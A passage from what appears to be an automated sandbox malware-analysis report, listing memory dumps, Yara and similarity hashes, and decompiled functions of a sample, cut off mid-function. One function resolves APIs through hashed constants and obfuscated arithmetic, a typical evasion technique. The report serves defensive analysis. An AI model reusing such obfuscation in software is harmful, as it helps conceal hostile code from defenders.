                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: UI$UI
                                            • API String ID: 0-658841096
                                            • Opcode ID: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
                                            • Instruction ID: 423d09612a974c53eb27a64e3f01ebfbe890b874c9ecf00de9eea2cf56467e7d
                                            • Opcode Fuzzy Hash: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
                                            • Instruction Fuzzy Hash: 1E31D0B5509342AFD395CE29C64A60FBBF0BB84B24F44CD5DE4E9921A4D3788909DF43
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00409C4D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: f557690f28c1f672e179aac3153d04dc0e65bf5786f1d79d99cffc9af07c7071
                                            • Instruction ID: 03bcb520bf2f563af268e7b5ec2d2dff604110816e44dfc8923e142131883431
                                            • Opcode Fuzzy Hash: f557690f28c1f672e179aac3153d04dc0e65bf5786f1d79d99cffc9af07c7071
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 66%
                                            			E02231C70(void* __ecx) {
                                            				char _v4;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				intOrPtr* _t57;
                                            				signed int _t58;
                                            				intOrPtr* _t64;
                                            				signed int _t65;
                                            				intOrPtr* _t67;
                                            				int _t73;
                                            				void* _t78;
                                            				signed int _t80;
                                            				signed int _t91;
                                            				void* _t110;
                                            				void* _t114;
                                            				void* _t115;
                                            				signed int _t117;
                                            				signed int* _t118;
                                            
                                            				_t118 =  &_v12;
                                            				_v8 = 0xac2a;
                                            				_v8 = _v8 ^ 0xfb427452;
                                            				_v8 = _v8 | 0x0433d0b5;
                                            				_v8 = _v8 ^ 0xff73d8f5;
                                            				_v12 = 0xb90d;
                                            				_v12 = _v12 + 0xffffc883;
                                            				_v12 = _v12 + 0xffff4556;
                                            				_v12 = _v12 + 0xffff66fa;
                                            				_v12 = _v12 + 0xffff302a;
                                            				_v12 = _v12 + 0xffffad71;
                                            				_v12 = _v12 << 0xc;
                                            				_v12 = _v12 ^ 0xe0b7b010;
                                            				_t57 =  *0x223dd4c;
                                            				_t114 = __ecx;
                                            				if(_t57 == 0) {
                                            					_t57 = E02233E80(_t78, E02233F20(0xbb398380), 0xae3c1a47, _t115);
                                            					 *0x223dd4c = _t57;
                                            				}
                                            				_t58 =  *_t57();
                                            				_v12 = 0x788;
                                            				_v12 = _v12 >> 0xc;
                                            				_t117 = _v8 + _t58 % _v12;
                                            				_v12 = _v12 + 0xffff671b;
                                            				_v12 = _v12 ^ 0x6acd08c3;
                                            				_v12 = _v12 * 0x32;
                                            				_v12 = _v12 + 0xffff2d32;
                                            				_v12 = _v12 ^ 0x491450b8;
                                            				_v12 = (_v12 - (0x29e4129f * _v12 >> 0x20) >> 1) + (0x29e4129f * _v12 >> 0x20) >> 6;
                                            				_v12 = _v12 ^ 0x00f88eb6;
                                            				_v8 = 0x2ce8;
                                            				_v8 = _v8 + 0xffffe7d1;
                                            				_v8 = _v8 * 0x4b;
                                            				_v8 = _v8 + 0x84e;
                                            				_v8 = _v8 ^ 0x00061a91;
                                            				_t64 =  *0x223dd4c;
                                            				if(_t64 == 0) {
                                            					_t64 = E02233E80(_t78, E02233F20(0xbb398380), 0xae3c1a47, _t117);
                                            					 *0x223dd4c = _t64;
                                            				}
                                            				_t65 =  *_t64();
                                            				_t67 =  *0x223dd4c;
                                            				_t80 = _v12 + _t65 % _v8;
                                            				if(_t67 == 0) {
                                            					_t67 = E02233E80(_t80, E02233F20(0xbb398380), 0xae3c1a47, _t117);
                                            					 *0x223dd4c = _t67;
                                            				}
                                            				_v4 =  *_t67();
                                            				if(_t117 != 0) {
                                            					_t110 = _t114;
                                            					_t91 = _t117 >> 1;
                                            					_t114 = _t114 + _t117 * 2;
                                            					_t73 = memset(_t110, 0x2d002d, _t91 << 2);
                                            					asm("adc ecx, ecx");
                                            					memset(_t110 + _t91, _t73, 0);
                                            					_t118 =  &(_t118[6]);
                                            				}
                                            				E02234ED0(_t114, _t80,  &_v4);
                                            				 *((short*)(_t114 + _t80 * 2)) = 0;
                                            				return 0;
                                            			}

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ,
                                            • API String ID: 0-48859977
                                            • Opcode ID: 4a693e48f3b638d3c8b9fd6831aa04809d268af8264f1953605d453153a1550c
                                            • Instruction ID: 18bfdedd8e2bf8a5fbbec0a0b785a9b33452003b8d4baa3fd39dd7a56ef68afa
                                            • Opcode Fuzzy Hash: 4a693e48f3b638d3c8b9fd6831aa04809d268af8264f1953605d453153a1550c
                                            • Instruction Fuzzy Hash: 034169B5A183069BC748EFA8E41412AB7E2AFC5314F00CD2DF4D68B254EB7899158F82
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00408293(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
                                            				signed int _v8;
                                            				signed char _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _t186;
                                            				void* _t187;
                                            				signed int _t188;
                                            				signed int* _t189;
                                            				intOrPtr _t191;
                                            				signed int* _t192;
                                            				signed int* _t193;
                                            				signed char _t194;
                                            				intOrPtr _t195;
                                            				intOrPtr* _t196;
                                            				signed int _t199;
                                            				signed int _t202;
                                            				signed int _t207;
                                            				signed int _t209;
                                            				signed int _t218;
                                            				signed int _t221;
                                            				signed int* _t222;
                                            				signed int _t227;
                                            				intOrPtr _t228;
                                            				intOrPtr _t229;
                                            				intOrPtr _t230;
                                            				char _t233;
                                            				signed int _t234;
                                            				signed char _t235;
                                            				signed int* _t237;
                                            				signed int* _t239;
                                            				signed int* _t244;
                                            				signed int* _t245;
                                            				signed char _t250;
                                            				intOrPtr _t256;
                                            				signed int _t257;
                                            				char _t258;
                                            				char _t259;
                                            				signed char _t260;
                                            				signed int* _t262;
                                            				signed int* _t267;
                                            				signed int* _t268;
                                            				char* _t270;
                                            				signed int _t274;
                                            				unsigned int _t275;
                                            				intOrPtr _t277;
                                            				unsigned int _t278;
                                            				intOrPtr* _t280;
                                            				void* _t281;
                                            				signed char _t290;
                                            				signed int _t292;
                                            				signed char _t295;
                                            				signed int _t298;
                                            				signed int _t302;
                                            				signed int* _t304;
                                            
                                            				_t222 = _a4;
                                            				_t280 = _a8;
                                            				_t186 =  *((intOrPtr*)(_t222 + 0x10));
                                            				_t292 = _a12 + 0x00000017 & 0xfffffff0;
                                            				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
                                            				_v16 = _t274 * 0x204 + _t186 + 0x144;
                                            				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
                                            				_a12 = _t227;
                                            				_t194 =  *(_t227 + _t280 - 4);
                                            				_t281 = _t227 + _t280 - 4;
                                            				_v8 = _t194;
                                            				if(_t292 <= _t227) {
                                            					if(__eflags < 0) {
                                            						_t195 = _a8;
                                            						_a12 = _a12 - _t292;
                                            						_t228 = _t292 + 1;
                                            						 *((intOrPtr*)(_t195 - 4)) = _t228;
                                            						_t196 = _t195 + _t292 - 4;
                                            						_a8 = _t196;
                                            						_t295 = (_a12 >> 4) - 1;
                                            						 *((intOrPtr*)(_t196 - 4)) = _t228;
                                            						__eflags = _t295 - 0x3f;
                                            						if(_t295 > 0x3f) {
                                            							_t295 = 0x3f;
                                            						}
                                            						__eflags = _v8 & 0x00000001;
                                            						if((_v8 & 0x00000001) == 0) {
                                            							_t298 = (_v8 >> 4) - 1;
                                            							__eflags = _t298 - 0x3f;
                                            							if(_t298 > 0x3f) {
                                            								_t298 = 0x3f;
                                            							}
                                            							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
                                            							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                                            								__eflags = _t298 - 0x20;
                                            								if(_t298 >= 0x20) {
                                            									_t128 = _t298 - 0x20; // -32
                                            									_t130 = _t186 + 4; // 0x4
                                            									_t244 = _t298 + _t130;
                                            									_t199 =  !(0x80000000 >> _t128);
                                            									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                                            									 *_t244 =  *_t244 - 1;
                                            									__eflags =  *_t244;
                                            									if( *_t244 == 0) {
                                            										_t245 = _a4;
                                            										_t138 = _t245 + 4;
                                            										 *_t138 =  *(_t245 + 4) & _t199;
                                            										__eflags =  *_t138;
                                            									}
                                            								} else {
                                            									_t304 = _t298 + _t186 + 4;
                                            									_t202 =  !(0x80000000 >> _t298);
                                            									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                                            									 *_t304 =  *_t304 - 1;
                                            									__eflags =  *_t304;
                                            									if( *_t304 == 0) {
                                            										 *_a4 =  *_a4 & _t202;
                                            									}
                                            								}
                                            								_t196 = _a8;
                                            							}
                                            							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                                            							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                                            							_t302 = _a12 + _v8;
                                            							_a12 = _t302;
                                            							_t295 = (_t302 >> 4) - 1;
                                            							__eflags = _t295 - 0x3f;
                                            							if(_t295 > 0x3f) {
                                            								_t295 = 0x3f;
                                            							}
                                            						}
                                            						_t229 = _v16;
                                            						_t230 = _t229 + _t295 * 8;
                                            						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
                                            						 *((intOrPtr*)(_t196 + 8)) = _t230;
                                            						 *((intOrPtr*)(_t230 + 4)) = _t196;
                                            						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
                                            						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
                                            						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
                                            							_t233 =  *(_t295 + _t186 + 4);
                                            							__eflags = _t295 - 0x20;
                                            							_a11 = _t233;
                                            							_t234 = _t233 + 1;
                                            							__eflags = _t234;
                                            							 *(_t295 + _t186 + 4) = _t234;
                                            							if(_t234 >= 0) {
                                            								__eflags = _a11;
                                            								if(_a11 == 0) {
                                            									_t237 = _a4;
                                            									_t176 = _t237 + 4;
                                            									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
                                            									__eflags =  *_t176;
                                            								}
                                            								_t189 = _t186 + 0xc4 + _t274 * 4;
                                            								_t235 = _t295 - 0x20;
                                            								_t275 = 0x80000000;
                                            							} else {
                                            								__eflags = _a11;
                                            								if(_a11 == 0) {
                                            									_t239 = _a4;
                                            									 *_t239 =  *_t239 | 0x80000000 >> _t295;
                                            									__eflags =  *_t239;
                                            								}
                                            								_t189 = _t186 + 0x44 + _t274 * 4;
                                            								_t275 = 0x80000000;
                                            								_t235 = _t295;
                                            							}
                                            							 *_t189 =  *_t189 | _t275 >> _t235;
                                            							__eflags =  *_t189;
                                            						}
                                            						_t188 = _a12;
                                            						 *_t196 = _t188;
                                            						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
                                            					}
                                            					L52:
                                            					_t187 = 1;
                                            					return _t187;
                                            				}
                                            				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
                                            					return 0;
                                            				} else {
                                            					_t250 = (_v8 >> 4) - 1;
                                            					_v12 = _t250;
                                            					if(_t250 > 0x3f) {
                                            						_t250 = 0x3f;
                                            						_v12 = _t250;
                                            					}
                                            					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                                            						if(_t250 >= 0x20) {
                                            							_t267 = _v12 + _t186 + 4;
                                            							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
                                            							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                                            							 *_t267 =  *_t267 - 1;
                                            							__eflags =  *_t267;
                                            							if( *_t267 == 0) {
                                            								_t268 = _a4;
                                            								_t44 = _t268 + 4;
                                            								 *_t44 =  *(_t268 + 4) & _t218;
                                            								__eflags =  *_t44;
                                            							}
                                            						} else {
                                            							_t270 = _v12 + _t186 + 4;
                                            							_t221 =  !(0x80000000 >> _t250);
                                            							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                                            							 *_t270 =  *_t270 - 1;
                                            							if( *_t270 == 0) {
                                            								 *_a4 =  *_a4 & _t221;
                                            							}
                                            						}
                                            					}
                                            					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                                            					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                                            					_v8 = _v8 + _a12 - _t292;
                                            					if(_v8 <= 0) {
                                            						_t277 = _a8;
                                            					} else {
                                            						_t290 = (_v8 >> 4) - 1;
                                            						_t256 = _a8 + _t292 - 4;
                                            						if(_t290 > 0x3f) {
                                            							_t290 = 0x3f;
                                            						}
                                            						_t207 = _v16 + _t290 * 8;
                                            						_a12 = _t207;
                                            						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
                                            						_t209 = _a12;
                                            						 *(_t256 + 8) = _t209;
                                            						 *((intOrPtr*)(_t209 + 4)) = _t256;
                                            						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
                                            						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
                                            							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
                                            							_a15 = _t258;
                                            							_t259 = _t258 + 1;
                                            							 *((char*)(_t290 + _t186 + 4)) = _t259;
                                            							if(_t259 >= 0) {
                                            								__eflags = _a15;
                                            								if(_a15 == 0) {
                                            									_t84 = _t290 - 0x20; // -33
                                            									_t262 = _a4;
                                            									_t86 = _t262 + 4;
                                            									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
                                            									__eflags =  *_t86;
                                            								}
                                            								_t193 = _t186 + 0xc4 + _t274 * 4;
                                            								_t91 = _t290 - 0x20; // -33
                                            								_t260 = _t91;
                                            								_t278 = 0x80000000;
                                            							} else {
                                            								if(_a15 == 0) {
                                            									 *_a4 =  *_a4 | 0x80000000 >> _t290;
                                            								}
                                            								_t193 = _t186 + 0x44 + _t274 * 4;
                                            								_t278 = 0x80000000;
                                            								_t260 = _t290;
                                            							}
                                            							 *_t193 =  *_t193 | _t278 >> _t260;
                                            						}
                                            						_t277 = _a8;
                                            						_t257 = _v8;
                                            						_t192 = _t277 + _t292 - 4;
                                            						 *_t192 = _t257;
                                            						 *(_t257 + _t192 - 4) = _t257;
                                            					}
                                            					_t191 = _t292 + 1;
                                            					 *((intOrPtr*)(_t277 - 4)) = _t191;
                                            					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
                                            					goto L52;
                                            				}
                                            			}
                                            0x00408352
                                            0x00408354
                                            0x00408357
                                            0x00408357
                                            0x00408357
                                            0x00408357
                                            0x00408317
                                            0x00408321
                                            0x00408325
                                            0x00408327
                                            0x0040832b
                                            0x0040832d
                                            0x00408332
                                            0x00408332
                                            0x0040832d
                                            0x00408315
                                            0x00408360
                                            0x00408369
                                            0x00408371
                                            0x00408378
                                            0x00408428
                                            0x0040837e
                                            0x00408387
                                            0x00408388
                                            0x0040838f
                                            0x00408393
                                            0x00408393
                                            0x00408397
                                            0x0040839a
                                            0x004083a0
                                            0x004083a3
                                            0x004083a6
                                            0x004083a9
                                            0x004083af
                                            0x004083b8
                                            0x004083ba
                                            0x004083c1
                                            0x004083c4
                                            0x004083c6
                                            0x004083ca
                                            0x004083ed
                                            0x004083f1
                                            0x004083f3
                                            0x004083fd
                                            0x00408400
                                            0x00408400
                                            0x00408400
                                            0x00408400
                                            0x00408403
                                            0x0040840a
                                            0x0040840a
                                            0x0040840d
                                            0x004083cc
                                            0x004083d0
                                            0x004083de
                                            0x004083de
                                            0x004083e0
                                            0x004083e4
                                            0x004083e9
                                            0x004083e9
                                            0x00408414
                                            0x00408414
                                            0x00408416
                                            0x00408419
                                            0x0040841c
                                            0x00408420
                                            0x00408422
                                            0x00408422
                                            0x0040842b
                                            0x0040842e
                                            0x00408431
                                            0x00000000
                                            0x00408431

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                            • Instruction ID: 00de992f94577e55d0855a628cf5fc13367e092eab98b966cb86fa3571df6218
                                            • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                            • Instruction Fuzzy Hash: 32B1603590021ADFDB15CF04C6D0AA9BBA1FB54318F14C1AED8596B382DB35EA42CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E02234E20() {
                                            
                                            				return  *[fs:0x30];
                                            			}



                                            0x02234e26

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                            • Instruction Fuzzy Hash:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E00423382(intOrPtr __ecx) {
                                            				int _t231;
                                            				void* _t239;
                                            				int _t240;
                                            				void* _t260;
                                            				void* _t267;
                                            				void* _t268;
                                            				CHAR* _t280;
                                            				signed int _t336;
                                            				int _t392;
                                            				CHAR* _t407;
                                            				signed int _t408;
                                            				signed int _t409;
                                            				int _t420;
                                            				struct tagSIZE* _t421;
                                            				int _t428;
                                            				signed int _t437;
                                            				int _t442;
                                            				signed int _t446;
                                            				void* _t447;
                                            				int _t453;
                                            				void* _t456;
                                            				intOrPtr _t461;
                                            
                                            				E00406520(E0042A9E0, _t456);
                                            				_t461 =  *0x439c44; // 0x1
                                            				 *((intOrPtr*)(_t456 - 0x50)) = __ecx;
                                            				if(_t461 == 0) {
                                            					_push(__ecx);
                                            					E0041A41D(_t456 - 0x44, __eflags);
                                            					 *(_t456 - 4) = 0;
                                            					 *(_t456 - 0x30) = E00416528(__ecx);
                                            					GetWindowRect( *(__ecx + 0x1c), _t456 - 0x28);
                                            					OffsetRect(_t456 - 0x28,  ~( *(_t456 - 0x28)),  ~( *(_t456 - 0x24)));
                                            					 *((intOrPtr*)(_t456 - 0x48)) = 0;
                                            					 *((intOrPtr*)(_t456 - 0x4c)) = 0x42d72c;
                                            					 *(_t456 - 4) = 1;
                                            					E0041A611(_t456 - 0x4c, CreateSolidBrush(GetSysColor(6)));
                                            					 *(_t456 - 0x5c) =  *(_t456 - 0x5c) & 0x00000000;
                                            					 *((intOrPtr*)(_t456 - 0x60)) = 0x42d72c;
                                            					 *(_t456 - 4) = 2;
                                            					asm("sbb eax, eax");
                                            					E0041A611(_t456 - 0x60, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 0xb)));
                                            					 *(_t456 - 0x54) =  *(_t456 - 0x54) & 0x00000000;
                                            					 *(_t456 - 0x58) = 0x42d72c;
                                            					 *(_t456 - 4) = 3;
                                            					asm("sbb eax, eax");
                                            					E0041A611(_t456 - 0x58, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 3)));
                                            					 *(_t456 - 0x10) = GetSystemMetrics(6);
                                            					 *(_t456 - 0x14) = GetSystemMetrics(5);
                                            					_t428 = GetSystemMetrics(0x21);
                                            					_t231 = GetSystemMetrics(0x20);
                                            					__eflags =  *(_t456 - 0x30) & 0x00040600;
                                            					_t442 = _t231;
                                            					if(( *(_t456 - 0x30) & 0x00040600) != 0) {
                                            						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
                                            						InflateRect(_t456 - 0x28,  ~( *(_t456 - 0x14)),  ~( *(_t456 - 0x10)));
                                            						E004232C5(_t456 - 0x44, _t456 - 0x28, _t442 -  *(_t456 - 0x14), _t428 -  *(_t456 - 0x10), _t456 - 0x60);
                                            						_t407 =  &(( *(_t456 - 0x10))[ *(_t456 - 0x10)]);
                                            						 *(_t456 - 0x74) = _t407;
                                            						_t408 =  *(_t456 - 0x14);
                                            						 *(_t456 - 0x18) = _t428 - _t407;
                                            						_t336 = _t442 - _t408 + _t408;
                                            						__eflags =  *(_t456 - 0x2f) & 0x00000002;
                                            						 *(_t456 - 0x2c) = _t336;
                                            						if(( *(_t456 - 0x2f) & 0x00000002) != 0) {
                                            							_t409 =  *(_t456 - 0x18);
                                            						} else {
                                            							_t436 = _t428 -  *(_t456 - 0x74) +  *0x439c9c;
                                            							_t455 = _t442 - _t408 + _t408 * 2 +  *0x439c98;
                                            							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c, _t336, 1, 0);
                                            							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *((intOrPtr*)(_t456 - 0x1c)) - _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
                                            							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
                                            							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *((intOrPtr*)(_t456 - 0x1c)) - _t436,  *(_t456 - 0x2c), 1, 0);
                                            							_t437 =  *(_t456 - 0x18);
                                            							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
                                            							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
                                            							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
                                            							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t455,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
                                            							_t336 =  *(_t456 - 0x2c);
                                            							_t409 = _t437;
                                            						}
                                            						InflateRect(_t456 - 0x28,  ~_t336,  ~_t409);
                                            					}
                                            					__eflags =  *(_t456 - 0x2e) & 0x000000c0;
                                            					if(( *(_t456 - 0x2e) & 0x000000c0) == 0) {
                                            						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
                                            						goto L25;
                                            					} else {
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t240 =  *0x439c9c; // 0x0
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t446 =  *(_t456 - 0x10);
                                            						 *(_t456 - 0x64) = _t240 + _t446 +  *(_t456 - 0x24);
                                            						E004232C5(_t456 - 0x44, _t456 - 0x70,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
                                            						InflateRect(_t456 - 0x70,  ~( *(_t456 - 0x14)),  ~_t446);
                                            						asm("sbb eax, eax");
                                            						FillRect( *(_t456 - 0x40), _t456 - 0x70,  ~(_t456 - 0x58) &  *(_t456 - 0x54));
                                            						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
                                            						_t260 =  *0x439ca0; // 0x0
                                            						__eflags = _t260;
                                            						if(_t260 != 0) {
                                            							 *(_t456 - 0x18) = SelectObject( *(_t456 - 0x40), _t260);
                                            							_t280 =  *0x436980; // 0x436994
                                            							 *(_t456 - 0x10) = _t280;
                                            							 *(_t456 - 4) = 4;
                                            							E004140EE( *((intOrPtr*)(_t456 - 0x50)), _t456 - 0x10);
                                            							_t421 = _t456 - 0x78;
                                            							asm("sbb esi, esi");
                                            							_t453 = ( ~( *(_t456 - 0x30) & 0x00080000) &  *0x439c98) +  *(_t456 - 0x70);
                                            							GetTextExtentPoint32A( *(_t456 - 0x3c),  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), _t421);
                                            							__eflags =  *(_t456 - 0x78) -  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70);
                                            							if( *(_t456 - 0x78) <=  *((intOrPtr*)(_t456 - 0x68)) -  *(_t456 - 0x70)) {
                                            								E0041A240(_t456 - 0x44, 6);
                                            								asm("cdq");
                                            								_t453 = _t453 + ( *((intOrPtr*)(_t456 - 0x68)) - _t453 - _t421 >> 1);
                                            								__eflags = _t453;
                                            							}
                                            							GetTextMetricsA( *(_t456 - 0x3c), _t456 - 0xb8);
                                            							InflateRect(_t456 - 0x70, 0, 1);
                                            							asm("cdq");
                                            							asm("sbb eax, eax");
                                            							E00419E62(GetSysColor(( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) & 0x000000f6) + 0x13), _t456 - 0x44, _t302);
                                            							E00419DAA(_t456 - 0x44, 1);
                                            							ExtTextOutA( *(_t456 - 0x40), _t453,  *((intOrPtr*)(_t456 - 0x6c)) + ( *(_t456 - 0x64) -  *((intOrPtr*)(_t456 - 0xac)) +  *((intOrPtr*)(_t456 - 0xb0)) +  *((intOrPtr*)(_t456 - 0xb4)) -  *((intOrPtr*)(_t456 - 0x6c)) + 1 - _t421 >> 1), 4, _t456 - 0x70,  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), 0);
                                            							__eflags =  *(_t456 - 0x18);
                                            							if( *(_t456 - 0x18) != 0) {
                                            								SelectObject( *(_t456 - 0x40),  *(_t456 - 0x18));
                                            							}
                                            							 *(_t456 - 4) = 3;
                                            							E00416AEC(_t456 - 0x10);
                                            						}
                                            						__eflags =  *(_t456 - 0x2e) & 0x00000008;
                                            						if(( *(_t456 - 0x2e) & 0x00000008) == 0) {
                                            							L23:
